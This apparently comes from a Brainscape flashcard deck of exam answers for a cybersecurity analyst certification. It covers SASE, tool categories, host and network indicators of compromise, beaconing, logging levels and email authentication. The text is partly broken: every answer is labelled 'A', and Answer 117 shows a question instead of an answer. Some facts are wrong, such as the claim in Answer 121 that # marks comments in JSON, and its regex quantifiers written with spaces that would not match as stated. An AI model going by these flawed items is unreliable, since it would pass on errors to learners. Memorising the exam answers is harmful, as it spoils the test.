Secure Access Service Edge (SASE) has Firewall as a Service (FWaaS) as one of its components. Other components include secure web gateways (SWG), a cloud access security broker (CASB), and zero trust network access (ZTNA). SASE is used to ensure security in a software-defined wide area network (SD-WAN) environment, particularly in a cloud environment. SASE is often associated with the zero-trust model.

Answer 94

A

Software-defined networking (SDN) allows for dynamic reconfiguration of a network as a reaction to changes in volume, types of traffic, and security incidents.

Answer 95

A

FTK will satisfy the requirement of needing a forensic suite tool.

Burp Suite and Zed Attack Proxy (ZAP) are interception proxy tools. Another interception proxy tool is Vega.

DD is an imaging tool. While this type of tool is considered a forensics tool, it does not provide a forensic suite because it performs only one function, which is imaging.

Answer 96

A

Preventative – includes tools that provide intrusion prevention system (IPS), firewall, antivirus, anti-malware, Enhanced Mitigation Experience Toolkit (EMET), web proxy, and web application firewall services.

Answer 97

A

Collective – includes tools that provide network scanning, vulnerability scanning, security information and event management (SIEM), packet capture, and intrusion detection system (IDS) services.

Answer 98

A

Analytical – includes tools that provide vulnerability scanning, monitoring, and interception proxy services.

Answer 99

A

Exploit – includes tools that provide interception proxy, exploit frameworks, and fuzzer services.

Answer 100

A

Forensics – includes tools that provide forensics, hashing, password cracking, and imaging services.

Answer 101

A

User behavior analysis and analytics will be of no help when a hacker breaks the key to a hashed password, which is one that has had a message digest value generated using a hashing algorithm like SHA. If the message digest value is identified, the hacker will be able to identify the password. You cannot directly turn a hashed value into the password, but you can work out what the password is if you continually generate hashes from passwords until you find one that matches.

Any abnormal user behavior can be evidence of a system compromise. Examples include:

Editing of user groups or other abnormal account activity
Communication attempts from unusual geographic locations or impossible travel
User activity at odd hours

Answer 102

A

Webhooks would not be suitable for deleting or updating data on other systems or databases. An API is the interface of the application that permits other programs or applications to request, input, delete, or update data in the application. A webhook uses an HTTP POST message to communicate from one application’s API to another application’s API. The communication is triggered in response to a user-defined event that occurs in the webhook’s application.

APIs and webhooks are used to accomplish similar goals, but in different ways. While APIs programmatically direct an entity to create an order, webhooks inform an API that an event has occurred. The message is used to trigger an action in response, such as sending an email or creating a calendar event.

Answer 103

A

Webhooks are suitable in number of scenarios, which include but are not limited to:

Notifying the customer support team when customers raise a payment dispute.
Automatically sending invoices to accounting department after customers pay via an e-commerce platform.
Sending an email to a developer to request a fix for a non-urgent issue.

Webhooks are used to automate workflows. Other real-world scenarios where webhooks can be used would include:

Notifying an agent in a chat application when a query is sent in the chatbot engine.

Automatically sending an email to a marketing team via customer relationship management (CRM) software when a customer makes a purchase or exits a shopping cart without buying.

Receiving automatic email reminder notifications from your calendar application on your phone.

Automatically uploading photos from one social media platform to another, such as from Instagram to Twitter.

Answer 104

A

Commercial (private) threat data feeds are a good source of threat intelligence, but they are not considered open source because they are only available to paid partners. Threat intelligence can also sometimes be obtained from internal sources such as the organization’s cybersecurity response team, but these are not considered open source because they are not available to all.

Answer 105

A

High memory consumption is considered a host-related symptom. It typically indicates the presence of malware. Host-related symptoms are those related to use of resources on the host that will be recorded in the local logs of a device. Unusual processor or memory consumption could be determined by using a resource monitor on the device. If either of these symptoms occur, then you should suspect a malicious process is using the processing resources or memory. The best course of action is to scan the device for malware.

Common host-related symptoms include unusual processing consumption, memory consumption, or drive capacity consumption; unauthorized software and malicious processes; unauthorized changes and privileges; and data exfiltration.

Issues with drive capacity consumption could also be determined by using a resource monitor on the device. When this symptom occurs, you should suspect that some malicious process is filling the drive as part of a DoS attack. Again, the best course of action is to scan the device for malware.

Unauthorized software could be detected with a vulnerability scan that identifies unauthorized software. When discovered, you should suspect that a malicious individual has compromised the device, even if the unauthorized software is not classified as malware. Some legitimate third-party software has known vulnerabilities that put your entire network at risk if it is installed. The best course of action is to re-image the device using the latest snapshot, if available. To ensure security, you should use a policy that prevents the installation of unauthorized software and ensure that users are trained in safe practices.

Malicious processes could be detected by using a tool like Process Explorer. You should suspect the presence of malware if you notice unusual processor, memory, or drive capacity usage on a host. The best course of action is to scan the device using anti-malware software. If you are unable to remove the malicious software, you should re-image the device using the latest snapshot, if available, and ensure that anti-malware programs are kept up to date.

Unauthorized changes could be discovered by performing a compliance scan in which the current device settings are compared to a baseline. When it occurs, you should suspect that the device has been compromised. You should attempt to restore the device to the correct settings and remove any unauthorized permissions that have been granted. You may need to re-image the device using the latest snapshot, if available. Ensure that users are trained in safe practices and that user accounts are hardened against privilege escalation.

The general recommendation for all host-related attacks is to keep anti-malware up to date and ensure that all users are trained in safe practices.

Answer 106

A

Unusual traffic spikes is a network-related indicator of compromise (IoC). It can indicate a denial-of-service (DoS) attack is underway.

Abnormal operating system behavior, such as an unexpected reboot, is a host-related IoC.

File system changes made in an unauthorized manner and system anomalies (actions taken by the system that are statistically unusual as determined by an algorithm) are host-related IoCs.

Unauthorized changes to the registry settings or settings that are statistically unusual as determined by an algorithm (registry anomalies) can indicate either malicious changes or mistakes in configuration. This is also considered a host-based IoC.

Unauthorized scheduled tasks are automated operations that have been configured by an unauthorized individual. While scheduling tasks is a function that can be quite helpful in taking care of mundane and repetitive maintenance tasks, when they are configured by an unauthorized person, it is a host-related IoC.

Answer 107

A

A Network Time Protocol (NTP) server allows devices to synchronize their clocks using a common source. Accurate time synchronization is important to corroborate events and to follow the sequence of events that occurred in an attack.

Answer 108

A

You could use a sinkhole. A sinkhole is a routing mechanism that can route traffic from a device being flooded to a location where the traffic can be studied.

Answer 109

A

In a peer-to-peer botnet, devices that can be reached externally are compromised and installed with server software that makes them command and control (C&C) servers. The compromised devices then carry out attacks. The best course of action is to identify whether a botnet is present, and if so, to check ALL devices for malware.

If you discover a case of illegal peer-to-peer software, then ensure that devices are scanned for unauthorized software on a regular basis. You should also keep all anti-malware programs up to date and ensure that users are trained in safe practices.

This is not a rogue device because it is a known device being managed. Rogue devices by definition are unknown and unmanaged.

This is not a sinkhole. A sinkhole is a target to which hostile traffic can be directed that provides an appropriate place to analyze the traffic.

This is not honeypot. A honeypot is a device made to be attractive to hackers and designed to engage them so that evidence can be gathered about them.

Answer 110

A

Secure sockets layer (SSL) inspection decrypts and opens incoming encrypted traffic, examines the contents for threats, and, providing there are no issues, re-encrypts the traffic for delivery.

Answer 111

A

Network segmentation involves dividing the network at either Layer 2 or Layer 3 to create desirable security barriers between devices in the network. It cannot route traffic from a device being flooded to a location where the traffic can be studied.

Answer 112

A

You would find Linux configuration files in the /etc/ directory. In Linux, each application and process has its own configuration file. The Linux file structure uses the /etc/ directory for configuration file locations.

Answer 113

A

JSON is an open standard file and data interchange format that uses human-readable text to store and transmit data objects consisting of attribute-value pairs and arrays.

Answer 114

A

Extensible Markup Language (XML) is a markup language and file format for storing, transmitting, and reconstructing data. It makes use of tags to delimit elements.

Answer 115

A

Python is a programming language that uses new lines to complete a command, as opposed to other programming languages which often use semicolons or parentheses.

Answer 116

A

PowerShell is an object-oriented automation engine and scripting language that features an interactive command-line shell that operates within Microsoft Windows. PowerShell was developed to help IT professionals configure systems and automate administrative tasks on Windows machines. Unlike other command-line shells that are based on text, PowerShell works with objects instead.

Answer 117

A

You are exploring the attack surface of a Windows 10 host. Which scripting environment is an automation standard for modern Windows systems?

A)VBA
B)Java
C)Bash
D)PowerShell

Answer 118

A

Bash (Bourne-Again Shell) is a common built-in command-line shell for UNIX and Linux systems.

Answer 119

A

Java is a class-based, object-oriented programming language that is designed to have as few implementation dependencies as possible. It is a general-purpose programming language.

Answer 120

A

Office Visual Basic for Applications (VBA) is an event-driven programming language that enables you to extend Office applications.

Answer 121

A

Regular expressions are sequences of characters that specify match patterns in text. While the use of regular expressions is somewhat complicated, the following regular expressions examples will execute a search as indicated:

a {5} will match “aaaaa”
n {3} will match “nnn”
[a-z] {4} will match any four-letter word such as “door”, “room” or “book”
[a-z] {6,} will match any word with six or more letters

Extensible Markup Language (XML) is a markup language and file format for storing, transmitting, and reconstructing data. It makes use of tags to delimit elements.

The # character is used in JSON to indicate comments, which are ignored by the shell. They begin with the hash symbol (#) and continue until the end of the line.

JSON is an open standard file and data interchange format that uses human-readable text to store and transmit data objects consisting of attribute-value pairs and arrays.

Answer 122

A

Beaconing refers to traffic that leaves your network at regular intervals. This type of traffic could be generated by compromised hosts that are attempting to communicate with (or call home to) the malicious party that compromised the host. The compromised hosts do this in response to the command and control software that is running on the hacker’s device. The best course of action is to identify the destination of the traffic and block it at the firewall. Beaconing indicates some sort of malware or compromise is present, so the best course of action is to remove all malware, and if the device still does not function properly after the malware removal, then re-image the device. You should also keep all anti-malware up to date and ensure that users are trained in safe practices.

This is not a ping sweep. A ping sweep would touch the device only once. Ping sweeps use ICMP to identify all live hosts by pinging all IP addresses in the known network. All devices that answer the ping are known to be up and running. The symptoms of this attack are unusual spikes in network traffic. These sweeps can be detected by intrusion detection systems (IDS) and intrusion prevention systems (IPS). They indicate an attempt to map your network. The best course of action is to identify the source of the sweeps. Going forward, you should also deploy an IPS or IDS, if not already present.

This is not a probe request. The device would not send these at regular intervals. That is a wireless transmission sent by a wireless station to associate with a WLAN that is not advertising its SSID.

This is not peer-to-peer traffic. Peer-to-peer traffic occurs between peers within your network or with hosts outside the network. This traffic would not be at regular intervals.

Answer 123

A

You would want to exclude the Notice logging level. Notice is used for events that are classified as informational and would not normally raise a security concern.

Logging levels are classifications that indicate the severity or urgency of the logged event. Common logging levels include Emergency, Alert, Critical, Error, Warning, Notice, and Debug. Log ingestion is the process of aggregating the logs collected from various devices across the network.

An Emergency logging level would indicate a critical system failure, which you would want to see in a syslog.

An Alert logging level would indicate a potential security threat.

A Critical logging level would indicate a serious system error.

Answer 124

A

Encrypting data at rest is not considered an active defense. An active defense either changes something in reaction to an indicator of compromise (IoC) or presents an immediate challenge or distraction to the IoC.

Rotating IP addresses for sensitive assets is a form of active defense and is designed to make it more difficult to fingerprint a system, which includes capturing its IP addresses.

Dynamically changing the network topologies in response to the appearance of an IoC is a form of active defense. For example, a router might respond to the appearance of an IoC by shutting down an interface and placing a new route in the routing table, thereby routing traffic around the area where the IoC was detected.

A honeypot is a network device made to be attractive to hackers and designed to engage them so that evidence can be gathered about their methods and avenues of attack.

Answer 125

A

One method of decomposing software is to use a decompiler to reconstruct the high-level code of the source language. Then it can be analyzed by one who understands the source code.

Answer 126

A

The tool displayed is Nessus, a widely used vulnerability scanner. It shows the vulnerabilities found by the tool and color-codes them by severity, as shown on the graphic.

Answer 127

A

The Metasploit tool is used to mount various types of attacks

Answer 128

A

National Institute of Standards and Technology (NIST) Special Publication 800-61 provides guidelines for all stages of handling Indicators of Compromise (IoC), including collection, analysis, and application.

Answer 129

A

The activity described is called beaconing. Beaconing refers to traffic leaving your network at regular intervals from the same device to the same destination. This type of traffic could be generated by compromised hosts that are attempting to communicate with (or call home to) the malicious party that compromised the host. Hosts attempt to communicate with what is called a command and control (C&C) server. The best course of action is to first identify the destination of the traffic and block it at the firewall. It indicates some sort of malware or compromise so you should also remove all malware. If the device still does not function properly after the malware removal, then re-image the device. You should also keep all anti-malware up to date and ensure that users are trained in safe practices.

Answer 130

A

IPS and IDS

Answer 131

A

The presence of malicious processes is a host-related symptom, not a network-related symptom. Common network-related symptoms of incidents are bandwidth consumption, beaconing, irregular peer-to-peer communication, rogue devices on the network, scan sweeps, and atypical traffic spikes.

Malicious processes are located on devices, and thus are considered a host-related symptom. Common host-related symptoms include unusual processing consumption, memory consumption, or drive capacity consumption; unauthorized software and malicious processes; unauthorized changes and privileges; and data exfiltration. The general recommendation for all host-related attacks is to keep anti-malware up to date and ensure that all users are trained in safe practices.

Unusual processor or memory consumption could be determined by using a resource monitor on the device. If either of these symptoms occurs, you should suspect a malicious process is using the processing resources or memory. The best course of action is to scan the device for malware.

Issues with drive capacity consumption could also be determined by using a resource monitor on the device. When this symptom occurs, you should suspect that some malicious process is filling the drive as part of a DoS attack. Again, the best course of action is to scan the device for malware.

Unauthorized software could be detected with a vulnerability scan that identifies unauthorized software. When discovered, you should suspect that a malicious individual has compromised the device, even if the unauthorized software is not classified as malware. Some legitimate third-party software has known vulnerabilities that put your entire network at risk if it is installed. The best course of action is to re-image the device using the latest snapshot, if available. To ensure security, you should use a policy that prevents the installation of unauthorized software and ensure that users are trained in safe practices.

Malicious processes could be detected using a tool like Process Explorer. You should suspect the presence of malware if you notice unusual processor, memory, or drive capacity usage on a host. The best course of action is to scan the device using anti-malware software. If you are unable to remove the malicious software, then you should re-image the device using the latest snapshot, if available, and ensure that anti-malware programs are kept up to date.

Unauthorized changes could be discovered by performing a compliance scan in which the current device settings are compared to a baseline. When it occurs, you should suspect that the device has been compromised. You should attempt to restore the device to the correct settings and remove any unauthorized permissions that have been granted. You may need to re-image the device using the latest snapshot, if available. Ensure that users are trained in safe practices and that user accounts are hardened against privilege escalation.

Unauthorized privileges could be discovered by examining the event log to determine which users are performing these privileged acts. If the user can be identified, then disciplinary action should be taken. If not, then the best course of action is to scan the device for malware and for compliance to the baseline. Ensure that users are trained in safe practices and that user accounts are hardened against privilege escalation.

Data exfiltration can be discovered with DLP software, if present. If not, then data exfiltration may be discovered only when it falls into the wrong hands. The best course of action is to identify the source of the disclosure, if possible, and then take disciplinary action and employ a DLP solution in the enterprise.

Answer 132

A

You would evaluate the following processes to verify whether they are suitable for automation:

Frequently executed processes

Processes in a security response playbook

Processes that do not require human intervention

Processes that correspond to relevant threat models

Repeated and repeatable tasks that are frequently executed in the same way using the same parameters are strong candidates for automation. The benefit of automating these tasks is the amount of human time and attention freed up for other duties, such as threat analysis. You would not automate rarely executed processes because doing so would not be a net gain of efficiency in operations.

Processes in a security playbook and processes that correspond to relevant threat models should also be automated where feasible. These processes have already been identified as best practices for the team to follow in response to specific types of incidents. Automated threat detection and response can both increase the speed of incident discovery and halt a threat before it has time to advance further than the perimeter of the attack surface.

Processes that do NOT require human intervention, such as continually monitoring the status of all endpoints connected to a secure internal network, are also best suited for automation. For example, if an unknown device is discovered, automated processes can alert a human technician and send all related telemetry data for analysis.

Finally, processes that correspond to threat models identified as relevant to your organization should be evaluated for automation. While other types of IT-related processes can be automated, doing so will not improve overall security operations.

Cybersecurity will always require human engagement, and you would not look to automate tasks that require human judgement or intervention. However, you would always want to automate tasks to provide the human analysts with supporting information regarding any alert or incident, such as automatically finding the GPS location of a mobile device being used for a suspicious login.

Whether a process involves a business-critical system or takes a long time to execute does not factor into how suitable it is for automation.

Answer 133

A

Federation allows customers of different cell phone services to communicate with each other. While each network has its own infrastructure, devices such as routers and gateways as well as network services are uniformly configured to a common standard. In general, federation allows members of disparate networks to communicate with each other.

Answer 134

A

A zero-day attack is one discovered in live environments for which no current fix or patch exists, as in this case.

Answer 135

A

You should deploy a jump box. A jump server or jump box is a server that is used to access devices that have been placed in a secure network zone, such as a perimeter network (formerly referred to in documentation as a DMZ). The server would span the two networks to provide access from an administrative desktop to the managed device.

Answer 136

A

This is an example of system isolation; in this case, it is Microsoft server isolation. The configuration required to allow the non-domain devices to be able to authenticate and connect with the server is called an exception.

Systems can be isolated from other systems through the control of communications with the device. By leveraging group policy settings, you can require that all communication with isolated servers must be authenticated and protected by using IPsec (and optionally encrypted as well). As group policy settings can only be applied to computers that are domain members, devices that are not domain members must be specified as exceptions to the rules controlling access to the device if they need access.

While it is true that entre networks can also be isolated from the network in general, this is not a perimeter network, and an acknowledgement is used on an intrusion detection system (IDS) to indicate that it has detected devices that are already known. A perimeter network is a network logically separate from the intranet where resources that will be accessed from the outside world are made available without requiring authentication. This type of network was previously referred to as a demilitarized zone (DMZ), but this term is no longer in common use.

This is also not a perimeter network with an exception. Exceptions are used with server isolation, not with perimeter networks.

This is not an extranet. An extranet contains resources available only to certain entities from the outside world through access that is secured with authentication. Exceptions are used with server isolation but not with extranets.

Answer 137

A

Changes to the file system is a host-related issue, as it will affect the entire system.

An unexpected outbound communication is an application-related issue. In many cases, it is an attempt by a malicious backdoor to call home to the hacker.

A service interruption is an application-related issue, and only involves the interruption of that service.

Any time an issue is reported to the Application log in Windows Event Viewer, it is an application-related issue. This log is maintained by Windows systems and records when something occurs within (or affects) the application. Examples of logged events would include:

Memory leaks
Non-existent path errors
Unhandled exceptions in the code
A system crash

Answer 138

A

Advanced persistent threats (APTs) are prolonged strategic attacks that hackers try to keep hidden so that they can continually exploit their targets. They are usually sourced from hostile nation-states and have high-profile targets, including national infrastructure and the military.

Answer 139

A

Controlling administrative access is MORE difficult in a cloud environment because access is provided through the Internet, eliminating the physical security and perimeter security provided in the on-premises environment

It is true that insiders with the provider may cause issues due to the rights they have working in your support.

It is true that with the responsibility split between the provider and the tenant, gaps in securing the solution may appear.

It is true that co-locations create a larger attack surface. In this scenario, you are sharing the virtual environment and there is more danger from other tenants, which is an issue that does not exist in on-premises environments.

Answer 140

A

Guest Internet access would be classified as non-critical business assets and processes because its loss would have very little, if any, impact on the ability to continue to operate normally.

Loss of the DNS server would bring the entire network down shortly after its loss. DNS services are required to access any asset, locally or remotely, by its name rather than its IP address.

Loss of the commerce server will spell a loss of income during the time it is down and damage to the organization’s reputation if it is an extended outage.

While the company chat server is not typically considered one of the business-critical assets and processes, as compared to guest Internet access, it would be considered more important as it provides a form of communication that could be a backup if email is down.

Answer 141

A

When an attacker is able to install a shell (also called dropping a shell), they will be able to access a command line interface to the system. In this scenario, one’s ability to interpret any strange commands they may have entered and executed may help to identify exactly what the attacker did or was attempting to do.

Answer 142

A

An email-based attack uses embedded and malicious links in an email. While training users not to click any hyperlinks in incoming emails is one solution, you can go a step further and disable hyperlinks in emails.

Answer 143

A

When an attacker alters an email header to obscure the sender and perform impersonation, a solution would be to implement DomainKeys Identified Mail (DKIM), an email authentication method designed to detect forged sender addresses in email (email spoofing), a technique often used in phishing and email spam.

Answer 144

A

When an attacker compromises the DNS system, a solution would be to implement Domain-based Message Authentication, Reporting, and Conformance (DMARC).

When a DMARC DNS entry is published, any receiving email server can authenticate the incoming email, preventing a delivery based on an altered header.

DMARC extends two email authentication mechanisms: Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM). It allows the administrative owner of a domain to publish a policy in their DNS records to specify how to check the From: field presented to end users.

Brainscape's Knowledge GenomeTM

1. Cyber Security Concepts Flashcards

Quiz Revision

Brainscape's Knowledge Genome^TM